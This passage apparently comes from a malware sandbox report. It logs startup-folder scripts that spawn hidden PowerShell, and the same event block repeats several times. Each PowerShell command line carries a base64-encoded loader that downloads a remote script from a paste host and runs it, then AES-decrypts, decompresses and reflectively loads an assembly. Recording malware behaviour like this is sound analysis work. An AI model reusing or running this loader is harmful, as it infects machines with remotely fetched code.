lKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRk